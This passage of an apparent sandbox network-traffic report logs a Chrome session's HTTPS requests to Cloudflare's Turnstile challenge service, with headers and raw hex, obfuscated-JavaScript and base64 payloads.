                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 35 36 3e 44 5b 67 4f 28 31 31 31 36 29 5d 28 30 29 29 7b 66 6f 72 28 78 3d 30 3b 64 5b 67 4f 28 37 32 38 29 5d 28 78 2c 47 29 3b 49 3c 3c 3d 31 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 67 4f 28 38 39 31 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 67 4f 28 31 31 31 36 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 67 4f 28 31 38 30 35 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 67 4f 28 31 30 34 30 29 5d 28 49 3c 3c 31 2e 37 36 2c 64 5b 67 4f 28 34 37 33 29 5d 28 4e 2c 31 29 29 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 67 4f 28 38 39 31 29 5d 28 64 5b 67 4f 28 39 35 30 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 64 5b 67 4f
                                                                                  Data Ascii: 56>D[gO(1116)](0)){for(x=0;d[gO(728)](x,G);I<<=1,j-1==J?(J=0,H[gO(891)](o(I)),I=0):J++,x++);for(N=D[gO(1116)](0),x=0;d[gO(1805)](8,x);I=d[gO(1040)](I<<1.76,d[gO(473)](N,1)),J==j-1?(J=0,H[gO(891)](d[gO(950)](o,I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;d[gO
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 53 2c 69 29 7b 72 65 74 75 72 6e 20 67 53 3d 67 4d 2c 69 3d 7b 27 42 6a 4b 70 48 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 2c 67 52 29 7b 72 65 74 75 72 6e 20 67 52 3d 62 2c 64 5b 67 52 28 35 34 32 29 5d 28 6a 2c 6b 29 7d 2c 27 69 61 70 77 4f 27 3a 67 53 28 39 39 31 29 7d 2c 64 5b 67 53 28 39 34 38 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 27 27 3d 3d 68 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 67 53 28 31 33 30 37 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 6a 2c 67 54 29 7b 69 66 28 67 54 3d 67 53 2c 64 5b 67 54 28 31 37 33 37 29 5d 3d 3d 3d 64 5b 67 54 28 31 37 33 37 29 5d 29 72 65 74 75 72 6e 20 68 5b 67 54 28 31 31 31 36 29 5d 28 6a 29 3b 65 6c 73 65 20 65 5b 67 54 28 38 38
                                                                                  Data Ascii: )]('')},'j':function(h,gS,i){return gS=gM,i={'BjKpH':function(j,k,gR){return gR=b,d[gR(542)](j,k)},'iapwO':gS(991)},d[gS(948)](null,h)?'':''==h?null:f.i(h[gS(1307)],32768,function(j,gT){if(gT=gS,d[gT(1737)]===d[gT(1737)])return h[gT(1116)](j);else e[gT(88
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 31 36 29 2c 49 3d 31 3b 64 5b 67 55 28 33 34 33 29 5d 28 49 2c 4e 29 3b 51 3d 64 5b 67 55 28 37 35 38 29 5d 28 4a 2c 4b 29 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28 4b 3d 6f 2c 4a 3d 73 28 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 67 55 28 35 35 32 29 5d 28 30 3c 51 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3b 43 5b 45 2b 2b 5d 3d 64 5b 67 55 28 31 34 34 32 29 5d 28 65 2c 4d 29 2c 52 3d 45 2d 31 2c 44 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 47 5b 67 55 28 31 35 35 33 29 5d 28 27 27 29 7d 69 66 28 64 5b 67 55 28 31 31 31 35 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 67 55 28 35 35 36 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 43 5b 52 5d 29 52 3d 43 5b 52 5d 3b 65 6c 73 65 20 69 66 28 45 3d 3d 3d 52 29 52 3d 64 5b 67 55 28 38 30 36
                                                                                  Data Ascii: 16),I=1;d[gU(343)](I,N);Q=d[gU(758)](J,K),K>>=1,K==0&&(K=o,J=s(L++)),M|=d[gU(552)](0<Q?1:0,I),I<<=1);C[E++]=d[gU(1442)](e,M),R=E-1,D--;break;case 2:return G[gU(1553)]('')}if(d[gU(1115)](0,D)&&(D=Math[gU(556)](2,F),F++),C[R])R=C[R];else if(E===R)R=d[gU(806
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 79 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 7c 7c 46 7d 2c 27 65 44 48 57 54 27 3a 67 58 28 31 31 39 33 29 2c 27 4f 6c 4a 76 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 55 55 58 53 57 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 7d 29 3b 74 72 79 7b 69 66 28 69 5b 67 58 28 38 34 30 29 5d 28 69 5b 67 58 28 31 31 36 32 29 5d 2c 67 58 28 36 31 38 29 29 29 7b 69 66 28 6a 3d 69 5b 67 58 28 31 33 35 34 29 5d 28 65 51 2c 66 5b 67 58 28 36 36 36 29 5d 2c 66 5b 67 58 28 31 36 38 38 29 5d 29 2c 66 5b 67 58 28 36 36 36 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 66 5b 67 58 28 36 36 36 29 5d 3d 4a 53 4f 4e 5b 67 58 28 31 35 34 35 29 5d 28 66
                                                                                  Data Ascii: y':function(E,F){return E||F},'eDHWT':gX(1193),'OlJvo':function(E,F){return E+F},'UUXSW':function(E,F){return E+F}});try{if(i[gX(840)](i[gX(1162)],gX(618))){if(j=i[gX(1354)](eQ,f[gX(666)],f[gX(1688)]),f[gX(666)]instanceof Error?f[gX(666)]=JSON[gX(1545)](f
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 67 59 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 28 67 59 3d 67 4a 2c 65 3d 7b 27 4b 69 6a 51 46 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 28 29 7d 2c 27 50 4c 55 69 62 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 7d 2c 27 55 77 50 55 61 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 6f 7d 2c 27 62 58 48 77 49 27 3a 67 59 28 31 32 33 38 29 2c 27 74 68 7a 4a 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 7d 2c 65 5b 67 59 28 31 31 33 36 29 5d 28 64 2c 45 72 72 6f 72 29 29 3f 28 66 3d 64 5b 67 59 28 33 37 36 29 5d 2c 64 5b 67 59 28
                                                                                  Data Ascii: )]=function(d,gY,e,f,g,h,i,j,k,l,m){(gY=gJ,e={'KijQF':function(n){return n()},'PLUib':function(n,o){return n instanceof o},'UwPUa':function(n,o){return n>o},'bXHwI':gY(1238),'thzJf':function(n,o,s){return n(o,s)}},e[gY(1136)](d,Error))?(f=d[gY(376)],d[gY(


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.456736104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:38 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1761043156:1736903627:FepZ0G07M88okGs1roo1whFJjHlwkPb89wlAxNZ6XgE/902245eceb0e5e66/uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 3235
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  CF-Chl-RetryAttempt: 0
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:38 UTC3235OUTData Raw: 76 5f 39 30 32 32 34 35 65 63 65 62 30 65 35 65 36 36 3d 34 61 58 4f 72 4f 66 4f 50 4f 30 4f 4c 6b 32 70 6b 32 48 4f 6b 24 39 4d 4a 6c 24 32 33 6b 64 64 32 35 75 32 39 37 4f 6b 67 32 2d 4f 39 58 6c 39 59 67 58 32 6f 46 67 32 47 6a 6b 79 34 32 57 4f 6b 48 58 32 39 71 77 61 5a 41 32 71 4d 32 4e 32 6b 61 32 71 58 43 37 32 75 32 5a 37 39 64 32 4d 37 46 58 32 50 41 37 5a 6c 33 37 77 43 41 4a 35 62 4f 46 48 63 55 32 33 67 6a 32 4b 32 52 49 31 35 67 32 42 48 38 32 7a 6b 43 63 48 79 33 64 33 6f 69 32 31 58 32 76 56 24 32 75 6d 58 38 4b 32 39 62 4d 32 6b 54 32 34 58 56 55 31 49 52 4b 4e 38 64 38 64 55 6e 45 66 4d 32 6f 49 72 54 58 2d 4a 52 32 47 61 32 54 4f 39 6e 32 42 30 64 32 47 4d 73 33 47 50 67 43 6a 7a 75 62 6d 77 72 32 2d 4b 37 4d 5a 37 32 74 72 4f 32 77 79
                                                                                  Data Ascii: v_902245eceb0e5e66=4aXOrOfOPO0OLk2pk2HOk$9MJl$23kdd25u297Okg2-O9Xl9YgX2oFg2Gjky42WOkHX29qwaZA2qM2N2ka2qXC72u2Z79d2M7FX2PA7Zl37wCAJ5bOFHcU23gj2K2RI15g2BH82zkCcHy3d3oi21X2vV$2umX8K29bM2kT24XVU1IRKN8d8dUnEfM2oIrTX-JR2Ga2TO9n2B0d2GMs3GPgCjzubmwr2-K7MZ72trO2wy
                                                                                  2025-01-15 02:00:38 UTC751INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 02:00:38 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 153196
                                                                                  Connection: close
                                                                                  cf-chl-gen: gzZ+NJLAmR+y0Qb/EEeLUmFPb0v5kwURiNUQZcAmBHgqaWd5BII1lMQ6+B5hEzoE7zt4it6wxKse15y35M7/bINLxkhmVUPpq5/yaROpECuKtr/2acWpFf7Y3aiXe66ICnrDjiFl6OvHFyYry15/hl850GazvIF6XgoUxwNM09+GWkNBtsdc0KJQqxSDfHypyACgnJYCXm8mSJ7fCq6uMTgzdVmt/wA9tqL6aQHW1Gun4xgJ2G3Mdui3sAsgyk2/o7TPfoJuzPQdbIWTX9edNYeLYca7U+s+OPQiiM03Ch9jwGq/qgaCCCjiX4+kE+nzezS+1J333vG2lQHR4Mq1k1zb6T3QREOamUlU39VLHJ49q4aRbXY0fpnzbvlq1HEX0J8EDHgEN31u3PhwGb++BRa5tJ6msnwbxHkQSxDTCZwWBbSOP7nHNPKzfw8IsCJmNzwHdHx4NdCs4HtggMSAhypKJjtaCKCgxhdPLs9wHpA=$yZz3+W1Y3n2Ln0w1ZriOPA==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902245f7cbeb7d24-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 02:00:38 UTC618INData Raw: 71 36 75 4f 6c 35 79 4d 6d 73 4b 5a 66 4d 57 7a 73 6f 61 56 75 38 71 4c 68 34 7a 4b 70 4d 2b 65 6b 73 69 68 6e 36 43 36 6c 4b 54 50 6e 4d 76 50 71 39 69 77 71 37 7a 43 6e 71 66 55 33 74 7a 5a 78 39 7a 4f 74 2b 37 49 35 39 43 76 79 76 66 4e 78 64 48 46 78 4d 66 34 7a 62 71 34 2b 63 33 5a 30 76 50 52 33 4d 54 66 38 2f 54 48 34 67 7a 39 7a 76 33 74 37 42 59 46 45 64 38 61 47 42 6a 36 30 77 77 63 2f 74 72 32 45 66 62 64 31 77 49 57 4b 68 6b 64 38 79 73 70 35 51 58 77 49 41 4c 74 4c 67 72 78 4a 41 45 4f 45 68 76 31 2f 54 67 31 2b 51 49 30 48 51 38 36 4f 68 30 6b 49 54 56 4b 41 79 45 6c 4f 78 45 70 44 52 34 51 52 45 68 4f 4e 30 51 7a 4c 6c 41 61 58 30 31 54 57 54 46 4f 5a 44 64 58 53 56 39 6f 59 32 46 74 57 6a 35 6e 61 57 42 73 63 43 39 30 53 6c 46 68 54 6e 6c
                                                                                  Data Ascii: q6uOl5yMmsKZfMWzsoaVu8qLh4zKpM+eksihn6C6lKTPnMvPq9iwq7zCnqfU3tzZx9zOt+7I59CvyvfNxdHFxMf4zbq4+c3Z0vPR3MTf8/TH4gz9zv3t7BYFEd8aGBj60wwc/tr2Efbd1wIWKhkd8ysp5QXwIALtLgrxJAEOEhv1/Tg1+QI0HQ86Oh0kITVKAyElOxEpDR4QREhON0QzLlAaX01TWTFOZDdXSV9oY2FtWj5naWBscC90SlFhTnl
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 74 36 69 45 6d 49 57 6c 78 39 64 6c 35 2f 69 30 75 5a 61 57 53 5a 69 56 6d 66 57 5a 47 57 6a 32 4f 51 64 6e 57 47 6d 48 56 71 6e 71 57 74 69 6e 39 36 70 4c 4a 31 73 32 2b 49 73 4c 4f 31 6c 35 71 66 6c 5a 4b 54 71 34 48 41 6f 4a 6d 6c 66 38 57 69 71 5a 75 45 68 36 2b 4b 69 74 4c 4e 7a 71 32 2f 78 62 47 7a 75 4e 79 38 32 36 65 35 31 36 75 32 6d 2b 58 65 74 4d 66 6d 71 4c 54 6e 32 4f 71 74 38 4e 33 6c 73 71 57 71 38 4c 2b 78 35 4c 44 77 38 72 69 36 33 74 7a 56 34 72 79 39 2f 4d 41 42 32 74 63 45 77 39 34 45 32 73 66 67 2f 75 66 45 32 2b 6a 71 46 42 44 59 44 77 55 4f 38 51 72 39 41 4e 59 63 41 64 33 37 2f 67 6a 68 4a 68 49 55 36 43 67 42 4c 4f 34 72 4a 43 67 79 4d 43 6e 77 38 6a 59 76 47 76 59 36 4c 52 37 36 50 6a 49 69 2f 6b 49 33 4a 67 4e 47 4e 43 6f 48 53
                                                                                  Data Ascii: t6iEmIWlx9dl5/i0uZaWSZiVmfWZGWj2OQdnWGmHVqnqWtin96pLJ1s2+IsLO1l5qflZKTq4HAoJmlf8WiqZuEh6+KitLNzq2/xbGzuNy826e516u2m+XetMfmqLTn2Oqt8N3lsqWq8L+x5LDw8ri63tzV4ry9/MAB2tcEw94E2sfg/ufE2+jqFBDYDwUO8Qr9ANYcAd37/gjhJhIU6CgBLO4rJCgyMCnw8jYvGvY6LR76PjIi/kI3JgNGNCoHS
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 77 62 6d 4e 6c 57 4a 57 4c 68 45 35 34 57 5a 56 64 6a 70 4b 51 58 48 79 63 70 71 57 71 69 4a 65 58 61 32 57 6a 59 71 71 4b 63 57 71 49 68 59 68 33 6a 4a 6d 57 6b 62 79 32 74 36 31 2f 71 37 69 78 67 61 2b 45 77 6f 47 56 74 49 76 49 78 4d 71 65 6d 5a 32 65 6a 64 43 6d 72 4c 57 57 70 4b 65 36 31 71 79 31 76 72 47 55 72 63 4f 37 76 4c 6e 46 76 65 61 39 79 63 4c 71 77 63 32 37 38 39 2f 4d 74 63 4f 79 39 66 58 34 72 64 6a 48 30 4c 76 70 75 65 43 35 37 2f 62 6d 31 2b 54 35 33 66 76 4d 43 74 6e 39 37 67 72 64 43 78 58 64 37 67 76 74 38 76 6a 71 36 75 6a 78 37 52 38 62 34 68 2f 37 48 2f 54 65 4b 52 6e 6b 46 50 34 6a 4a 75 63 70 4b 4f 73 41 44 77 45 51 46 41 6e 34 44 51 30 53 39 69 66 31 46 42 63 72 44 68 73 63 4d 79 68 41 53 7a 59 47 51 43 6b 38 52 54 49 4f 51 41
                                                                                  Data Ascii: wbmNlWJWLhE54WZVdjpKQXHycpqWqiJeXa2WjYqqKcWqIhYh3jJmWkby2t61/q7ixga+EwoGVtIvIxMqemZ2ejdCmrLWWpKe61qy1vrGUrcO7vLnFvea9ycLqwc2789/MtcOy9fX4rdjH0LvpueC57/bm1+T53fvMCtn97grdCxXd7gvt8vjq6ujx7R8b4h/7H/TeKRnkFP4jJucpKOsADwEQFAn4DQ0S9if1FBcrDhscMyhASzYGQCk8RTIOQA
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 6d 5a 65 4e 57 46 71 64 6b 6f 46 65 6f 59 2b 46 59 71 57 55 70 47 56 36 70 61 56 6c 71 36 32 64 61 61 65 79 72 72 69 57 71 58 47 62 6b 4a 47 56 70 37 36 76 65 71 4f 67 6c 5a 2b 76 76 71 6d 47 71 38 6d 49 6e 37 6d 2f 72 34 6a 51 72 72 32 4d 30 4a 47 79 6a 4c 76 62 32 4e 6e 57 73 64 65 30 30 61 4c 43 30 4f 48 66 33 37 75 36 35 36 54 4c 76 61 32 2b 33 71 7a 52 37 4b 2f 32 37 62 62 37 78 39 71 7a 38 4d 76 63 39 4f 44 32 75 39 41 49 2f 63 6a 33 39 4f 66 58 31 51 37 4a 41 4f 73 54 41 77 7a 6d 39 67 50 77 43 2b 4d 58 30 2f 30 61 2f 64 33 30 32 52 6f 68 48 4f 4d 53 42 79 63 67 36 52 2f 35 2f 4f 73 6c 2f 67 34 65 45 2b 73 70 43 50 67 6f 4a 52 62 31 4f 7a 30 5a 48 51 38 2f 50 66 77 34 42 42 73 52 51 41 45 73 51 43 30 46 4d 43 5a 44 48 55 6b 2f 50 31 45 50 44 31 4e
                                                                                  Data Ascii: mZeNWFqdkoFeoY+FYqWUpGV6paVlq62daaeyrriWqXGbkJGVp76veqOglZ+vvqmGq8mIn7m/r4jQrr2M0JGyjLvb2NnWsde00aLC0OHf37u656TLva2+3qzR7K/27bb7x9qz8Mvc9OD2u9AI/cj39OfX1Q7JAOsTAwzm9gPwC+MX0/0a/d302RohHOMSBycg6R/5/Osl/g4eE+spCPgoJRb1Oz0ZHQ8/Pfw4BBsRQAEsQC0FMCZDHUk/P1EPD1N
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 59 79 6a 68 49 5a 65 6d 32 64 2b 6e 49 43 61 69 34 52 2b 6d 71 69 50 72 6f 2b 68 6c 6e 4b 67 65 49 57 56 64 33 6d 32 75 72 70 38 72 38 4f 4d 74 70 68 2f 68 4d 62 41 78 63 71 59 77 38 48 52 79 36 33 43 79 61 65 6b 72 73 69 50 6f 71 4f 75 79 5a 61 6f 6d 70 36 63 6c 5a 62 55 74 37 71 66 76 65 50 6b 70 73 6e 69 79 65 2f 48 77 62 76 53 36 61 2f 79 77 62 50 6a 36 65 65 34 31 4d 7a 4c 37 37 2f 34 7a 66 6e 47 34 75 6a 38 33 41 76 69 44 75 66 4e 43 2f 6f 4d 46 42 4c 68 37 64 59 54 44 52 41 61 47 42 50 59 32 68 34 52 41 74 34 69 46 67 62 69 4a 68 73 4b 35 69 6f 59 44 75 6f 75 48 53 33 74 41 79 34 75 37 54 51 32 4a 76 45 77 4f 7a 64 42 48 51 77 50 4c 68 6f 61 52 43 4a 4a 4f 41 4d 73 4b 52 34 6f 4f 45 63 79 44 7a 52 53 45 53 68 43 53 43 38 55 4e 78 56 57 4d 6c 30 30
                                                                                  Data Ascii: YyjhIZem2d+nICai4R+mqiPro+hlnKgeIWVd3m2urp8r8OMtph/hMbAxcqYw8HRy63CyaekrsiPoqOuyZaomp6clZbUt7qfvePkpsniye/HwbvS6a/ywbPj6ee41MzL77/4zfnG4uj83AviDufNC/oMFBLh7dYTDRAaGBPY2h4RAt4iFgbiJhsK5ioYDuouHS3tAy4u7TQ2JvEwOzdBHQwPLhoaRCJJOAMsKR4oOEcyDzRSEShCSC8UNxVWMl00
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 71 70 71 48 6c 71 69 6f 78 38 6d 59 31 72 6e 5a 57 6e 63 4b 32 4a 6b 70 43 4b 75 59 2b 5a 6b 4a 32 33 6a 6f 7a 46 74 48 69 58 66 6f 54 4a 78 63 61 73 76 38 6e 4f 7a 61 4f 4e 6c 4b 33 51 31 62 4b 56 74 61 71 74 6b 35 65 58 31 73 6e 63 77 4c 61 79 6e 74 71 2b 35 36 6d 38 32 4d 72 68 35 72 76 50 30 64 54 47 74 4c 57 30 73 71 76 78 2b 72 6e 57 39 50 51 41 41 62 6e 4d 42 4c 34 41 77 77 55 4b 41 4e 7a 5a 33 51 7a 67 2b 51 2f 4c 30 73 34 54 38 78 55 54 47 77 37 31 43 74 76 39 48 4e 49 62 2f 65 48 61 2b 50 6a 34 35 2f 77 54 46 39 34 42 36 79 50 69 42 65 2f 72 35 67 6e 79 42 65 6f 4e 39 68 6e 75 45 66 72 33 38 68 58 39 49 66 59 5a 41 6a 76 36 48 51 59 45 2f 69 45 4a 48 51 4d 6c 44 54 30 71 56 55 39 51 52 68 68 45 55 55 6f 61 53 42 31 62 47 6a 46 67 4d 6d 63 64 4d
                                                                                  Data Ascii: qpqHlqiox8mY1rnZWncK2JkpCKuY+ZkJ23jozFtHiXfoTJxcasv8nOzaONlK3Q1bKVtaqtk5eX1sncwLayntq+56m82Mrh5rvP0dTGtLW0sqvx+rnW9PQAAbnMBL4AwwUKANzZ3Qzg+Q/L0s4T8xUTGw71Ctv9HNIb/eHa+Pj45/wTF94B6yPiBe/r5gnyBeoN9hnuEfr38hX9IfYZAjv6HQYE/iEJHQMlDT0qVU9QRhhEUUoaSB1bGjFgMmcdM
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 48 69 6f 47 4c 6c 4a 43 77 72 5a 5a 78 69 61 35 32 6c 59 56 2b 65 49 75 4a 6a 4c 68 39 6d 61 61 30 70 35 64 38 75 63 53 6a 74 71 61 61 79 72 32 65 6f 4e 43 67 74 4d 4b 68 79 4a 53 7a 6c 64 4b 65 72 63 6d 2f 6d 39 36 37 6e 71 58 61 35 72 79 70 79 4d 48 67 7a 2b 2f 47 30 64 50 6e 35 4e 37 42 39 76 47 36 2f 4c 76 31 33 4c 62 68 7a 67 41 45 39 50 37 53 78 75 63 44 78 65 59 44 78 77 50 47 79 2f 44 6f 2b 39 4d 50 45 76 66 75 39 50 49 47 32 64 6e 77 38 66 6a 32 41 67 2f 73 33 52 76 33 43 68 59 4d 39 69 62 6a 48 65 6a 6d 37 54 51 68 42 51 41 45 4e 41 54 30 4e 2f 54 32 48 79 6f 41 2b 44 4d 35 52 52 38 41 4f 2f 34 42 4f 77 49 6f 52 42 31 4c 55 41 77 4d 50 30 41 48 54 79 78 42 45 6c 63 6a 4e 30 64 48 53 30 41 36 57 43 45 78 51 43 46 65 59 6c 4a 57 4a 57 56 69 57 6c
                                                                                  Data Ascii: HioGLlJCwrZZxia52lYV+eIuJjLh9maa0p5d8ucSjtqaayr2eoNCgtMKhyJSzldKercm/m967nqXa5rypyMHgz+/G0dPn5N7B9vG6/Lv13LbhzgAE9P7SxucDxeYDxwPGy/Do+9MPEvfu9PIG2dnw8fj2Ag/s3Rv3ChYM9ibjHejm7TQhBQAENAT0N/T2HyoA+DM5RR8AO/4BOwIoRB1LUAwMP0AHTyxBElcjN0dHS0A6WCExQCFeYlJWJWViWl
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 69 59 65 7a 75 4b 57 77 68 71 2b 77 74 6f 71 75 66 62 36 50 6b 6e 36 65 67 72 36 39 75 4b 75 6e 68 4b 4b 5a 79 36 57 6a 30 35 48 42 7a 4b 4c 4c 7a 4e 4b 6d 79 72 57 7a 72 36 36 61 75 70 37 61 32 64 54 48 77 36 58 72 70 4c 2f 48 30 4b 4c 67 71 72 7a 69 76 63 66 46 30 50 6a 4f 2f 4c 7a 49 35 76 50 65 30 74 4c 4e 39 76 33 32 31 50 51 4a 42 75 72 39 31 51 4c 38 45 73 6b 4e 78 51 66 72 33 39 41 4e 34 52 6a 6d 36 41 6b 4b 2f 74 72 72 33 66 72 61 33 2f 72 78 39 78 51 56 2b 4f 50 6b 42 67 7a 39 49 53 49 72 4b 69 67 4a 44 67 49 47 4b 67 55 4a 47 51 35 41 46 78 51 36 4c 6a 6f 30 42 44 41 2f 47 67 4e 4e 47 77 59 64 53 54 77 73 51 6a 38 39 4b 46 45 76 4c 78 52 57 52 55 56 63 46 30 6c 65 51 46 67 31 58 47 46 45 56 47 42 55 57 30 59 31 5a 55 45 71 50 30 42 53 4b 6d 70
                                                                                  Data Ascii: iYezuKWwhq+wtoqufb6Pkn6egr69uKunhKKZy6Wj05HBzKLLzNKmyrWzr66aup7a2dTHw6XrpL/H0KLgqrzivcfF0PjO/LzI5vPe0tLN9v321PQJBur91QL8EskNxQfr39AN4Rjm6AkK/trr3fra3/rx9xQV+OPkBgz9ISIrKigJDgIGKgUJGQ5AFxQ6Ljo0BDA/GgNNGwYdSTwsQj89KFEvLxRWRUVcF0leQFg1XGFEVGBUW0Y1ZUEqP0BSKmp
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 72 64 31 72 48 6d 65 74 35 75 57 73 38 4f 46 74 4d 66 41 71 4d 76 4c 72 61 71 50 6b 61 71 78 6f 71 50 4b 77 37 44 50 6c 61 65 32 71 71 71 35 75 4c 71 78 31 37 61 33 33 64 48 64 31 36 66 54 34 72 32 6d 38 4c 36 70 77 4f 7a 66 7a 2b 58 69 34 4d 76 30 30 75 53 30 41 4f 41 42 36 65 76 67 34 2f 33 6c 31 2f 72 33 33 4f 55 49 44 66 30 47 32 77 48 4f 2f 64 44 39 42 4f 55 4d 34 76 54 35 46 78 33 33 44 2b 44 64 2f 76 55 6d 2f 74 77 4a 42 78 58 79 4a 50 62 6a 4b 75 33 36 49 52 49 44 2f 53 45 4e 41 2f 41 44 47 78 77 6c 48 2f 6f 4b 4d 6a 41 63 46 42 30 68 45 7a 67 5a 50 44 74 45 4c 42 38 4b 4a 6b 56 4b 48 53 6b 2f 56 56 49 33 53 54 4e 4f 50 55 74 57 47 53 68 56 55 46 73 2b 59 47 56 57 57 78 38 6d 49 6a 5a 75 52 79 56 52 54 31 30 37 62 44 38 73 63 6a 5a 44 61 56 70 4c
                                                                                  Data Ascii: rd1rHmet5uWs8OFtMfAqMvLraqPkaqxoqPKw7DPlae2qqq5uLqx17a33dHd16fT4r2m8L6pwOzfz+Xi4Mv00uS0AOAB6evg4/3l1/r33OUIDf0G2wHO/dD9BOUM4vT5Fx33D+Dd/vUm/twJBxXyJPbjKu36IRID/SENA/ADGxwlH/oKMjAcFB0hEzgZPDtELB8KJkVKHSk/VVI3STNOPUtWGShVUFs+YGVWWx8mIjZuRyVRT107bD8scjZDaVpL


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.456737104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:39 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1761043156:1736903627:FepZ0G07M88okGs1roo1whFJjHlwkPb89wlAxNZ6XgE/902245eceb0e5e66/uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
